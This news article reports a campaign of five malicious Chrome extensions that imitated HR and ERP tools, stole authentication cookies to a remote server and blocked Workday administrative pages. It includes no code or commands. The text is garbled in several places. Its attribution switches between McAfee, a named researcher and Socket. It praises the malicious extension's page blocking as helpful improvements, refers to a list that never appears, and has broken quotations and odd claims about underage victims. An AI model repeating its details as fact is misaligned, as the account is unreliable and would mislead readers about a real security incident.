Cybersecurity specialists from McAfee found five malicious Google Chrome extensions. These extensions make you believe that they are real human resources (HR) and enterprise resource planning (ERP) systems. The extensions try to hijack user accounts, creating unintended risks to organizations that depend on these essential systems. The sophisticated threat has sent shockwaves through the cybersecurity community, leading experts to rethink the future fight against increasingly advanced attacks.
These five extensions, intended to replicate these trusted applications, have recently been widely criticized for their deceptive practices. They do more than just grab authentication cookies, they build in functionality so they can track everything users are doing. The bad versions mirror this list of 23 security-related Chrome extensions. These are by no means obscure tools, as they include widely used tools like EditThisCookie, Cookie-Editor, ModHeader, Redux DevTools and SessionBox.
Coordinated Attack Campaign
Security analysts assess that the campaign represents a coordinated operation, given the identical functionality and infrastructure patterns observed across the extensions. This implies a common threat actor or a common toolkit behind the attack. The two known extensions, DataByCloud 1 and DataByCloud 2, appeared on Aug 18, 2021. This emphasizes the long-lasting nature of the threat they present.
Data By Cloud 2 features significant and impressive improvements from its predecessor, including the ability to block access to 56 individual pages. It makes it easy to update passwords regularly. You can control two-factor authentication (2FA) devices and view security audit logs. The nefarious extensions exfiltrate the gathered cookies to a remote server under the “api.databycloud[.]com” domain every minute. Since this transmission is so quick, it allows an attacker to hijack accounts immediately.
The extensions work in concert to steal authentication tokens, block incident response capabilities, and enable complete account takeover through session hijacking.” – Kush Pandya
The matching extension ID whitelist seen in all five malicious extensions also suggests a common source. This shared trait lends considerable heft to the inference that it is due to common ancestry. This trait is deeply troubling, as it opens the door for profitable harm to millions of unsuspecting—and often underage—users.
Evasion Techniques and Impacts
The malicious extensions use a host of techniques to avoid detection, including the encryption of their command-and-control (C2) traffic. With the exception of Software Access, Google has since removed all five extensions from the Chrome Web Store. Even so, those extensions continue to circulate on third-party software download sites like Softonic. This resilience is a testament to the uphill battle that cybersecurity teams fight every day to prevent harm from this kind of duplicitous software.
The intrusive functionality of these extensions exceeds the scope of cookie theft. They notoriously block victims from reaching specific administrative pages on systems such as Workday, for instance.
“Tool Access 11 (v1.4) prevents access to 44 administrative pages within Workday by erasing page content and redirecting to malformed URLs,” – Kush Pandya
These advanced capabilities only serve to complicate incident response efforts and add even more sporting vulnerability to impacted organizations.
Implications for Security Teams
As organizations increasingly rely on digital platforms for HR and ERP functions, the implications of these malicious extensions are profound. The combination of continuous credential theft, administrative interface blocking, and session hijacking creates a scenario where security teams can detect unauthorized access but cannot remediate through normal channels.
This installs the victim’s authentication state directly into the threat actor’s browser session.” – Socket
Together, these trends highlight the need for continued vigilance and proactive approaches to cybersecurity. It is imperative that organizations make strong security practices a priority, including regular system audits, user training, and strict policies on third-party software installations.